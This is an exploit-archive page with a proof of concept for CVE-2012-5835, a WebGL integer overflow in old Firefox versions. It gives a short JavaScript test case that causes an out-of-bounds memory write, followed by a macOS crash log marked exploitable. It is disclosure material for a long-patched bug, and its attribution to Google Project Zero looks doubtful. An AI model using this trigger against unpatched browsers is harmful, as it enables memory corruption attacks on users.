exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox WebGL Proof Of Concept

Mozilla Firefox WebGL Proof Of Concept
Posted Feb 15, 2017
Authored by Bikash Dash

Proof of concept code demonstrating a WebGL integer overflow from 2012 in Mozilla Firefox versions prior to 17 and ESR 10.x versions before 10.0.11.

tags | exploit, overflow, proof of concept
advisories | CVE-2012-5835
SHA-256 | 007ca774585a830b71b08631a7e5718fc0eb3a94767134d2128687b2e2c600e5

Mozilla Firefox WebGL Proof Of Concept

Change Mirror Download
# Exploit Title: Integer overflow happens WebGL system in Mozila Firefox
# Date: 15-02-2017
# Software Link: https://www.mozilla.org/en-US/firefox/new/
# Exploit Author: (Originally Found by Google Project 0 team)Bikash Dash
#Tested On:MAC OS x86
# Website: http://vulnerableghost.com/
# CVE: CVE-2012-5835
# Category: webapps(Mozila)
<html>
<head>
<script>
gl=document.createElement('canvas').getContext('experimental-webgl')
var buf = gl.createBuffer()
gl.bindBuffer(gl.ARRAY_BUFFER, buf)
var magic = 0x12345678
gl.bufferData(gl.ARRAY_BUFFER, new Uint8Array(magic+1), gl.STATIC_DRAW)
gl.bufferData(gl.ARRAY_BUFFER, Math.pow(2, 32), gl.STATIC_DRAW)
gl.bufferSubData(gl.ARRAY_BUFFER, magic, new Uint8Array(1))
</script>
</head>
</html>
Crash Information:
exception=EXC_BAD_ACCESS:signal=11:is_exploitable=yes:instruction_disassembly=movb %al,(%rdi):instruction_address=0x00007fff92c82a41:access_type=write:access_address=0x0000000012345678:
Crash accessing invalid address. Consider running it again with libgmalloc(3) to see if the log changes.
Test case was b291.html


Process: firefox [3732]
Path: /Applications/Firefox.app/Contents/MacOS/firefox
Identifier: firefox
Version: ??? (???)
Code Type: X86-64 (Native)
Parent Process: exc_handler [3731]

Date/Time: 2017-02-15 10:44:52.818 +0300
OS Version: Mac OS X 10.8.1 (12B19)
Report Version: 9

Crashed Thread: 0 Dispatch queue: com.apple.main-thread

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000012345678

Thread 0 Crashed:: Dispatch queue: com.apple.main-thread
0 libsystem_c.dylib 0x00007fff92c82a41 memmove$VARIANT$sse42 + 57
1 GLEngine 0x000000010cfa9982 glBufferSubData_Exec + 856
2 XUL 0x00000001020df955 0x10111a000 + 16537941
3 XUL 0x000000010257424b 0x10111a000 + 21340747
4 XUL 0x0000000102564622 0x10111a000 + 21276194
5 XUL 0x0000000102573ae2 0x10111a000 + 21338850
6 XUL 0x0000000102573ce9 0x10111a000 + 21339369
7 XUL 0x0000000102573fe5 0x10111a000 + 21340133
8 XUL 0x00000001024f2d2d 0x10111a000 + 20811053
9 XUL 0x00000001024f2e5b JS_EvaluateUCScriptForPrincipalsVersionOrigin + 107
10 XUL 0x000000010182121d 0x10111a000 + 7369245
11 XUL 0x00000001015ef000 0x10111a000 + 5066752
12 XUL 0x00000001015f0538 0x10111a000 + 5072184
13 XUL 0x00000001015f117a 0x10111a000 + 5075322
14 XUL 0x00000001015ee4bd 0x10111a000 + 5063869
15 XUL 0x00000001019a41b6 0x10111a000 + 8954294
16 XUL 0x00000001019a6285 0x10111a000 + 8962693
17 XUL 0x00000001019aa94d 0x10111a000 + 8980813
18 XUL 0x00000001021324f3 0x10111a000 + 16876787
19 XUL 0x00000001020f1c0e 0x10111a000 + 16612366
20 XUL 0x0000000101f5b009 0x10111a000 + 14946313
21 XUL 0x0000000101f1f4bf 0x10111a000 + 14701759
22 com.apple.CoreFoundation 0x00007fff917fd841 __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ + 17
23 com.apple.CoreFoundation 0x00007fff917fd165 __CFRunLoopDoSources0 + 245
24 com.apple.CoreFoundation 0x00007fff918204e5 __CFRunLoopRun + 789
25 com.apple.CoreFoundation 0x00007fff9181fdd2 CFRunLoopRunSpecific + 290
26 com.apple.HIToolbox 0x00007fff8f6f3774 RunCurrentEventLoopInMode + 209
27 com.apple.HIToolbox 0x00007fff8f6f3512 ReceiveNextEventCommon + 356
28 com.apple.HIToolbox 0x00007fff8f6f33a3 BlockUntilNextEventMatchingListInMode + 62
29 com.apple.AppKit 0x00007fff96591fa3 _DPSNextEvent + 685
30 com.apple.AppKit 0x00007fff96591862 -[NSApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 128
31 XUL 0x0000000101f1e942 0x10111a000 + 14698818
32 com.apple.AppKit 0x00007fff96588c03 -[NSApplication run] + 517
33 XUL 0x0000000101f1ed2d 0x10111a000 + 14699821
34 XUL 0x0000000101d867b4 0x10111a000 + 13027252
35 XUL 0x0000000101121193 0x10111a000 + 29075
36 XUL 0x0000000101125fbb 0x10111a000 + 49083
37 XUL 0x00000001011264c3 XRE_main + 307
38 org.mozilla.firefox 0x0000000100001e15 0x100000000 + 7701
39 org.mozilla.firefox 0x0000000100001584 start + 52

Thread 0 crashed with X86 Thread State (64-bit):
rax: 0xffffffff0b4f3400 rbx: 0x000000011506ac00 rcx: 0x0000000000000000 rdx: 0x0000000000000001
rdi: 0x0000000012345678 rsi: 0x0000000106e521d1 rbp: 0x00007fff5fbfb9d0 rsp: 0x00007fff5fbfb9d0
r8: 0x0000000000000000 r9: 0x00007fff5fbfb970 r10: 0x000000010a50c5b0 r11: 0x0000000012345678
r12: 0x0000000012345678 r13: 0x0000000113607b68 r14: 0x0000000113607b40 r15: 0x0000000000000001
rip: 0x00007fff92c82a41 rfl: 0x0000000000010206 cr2: 0x0000000012345678
Logical CPU: 2
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close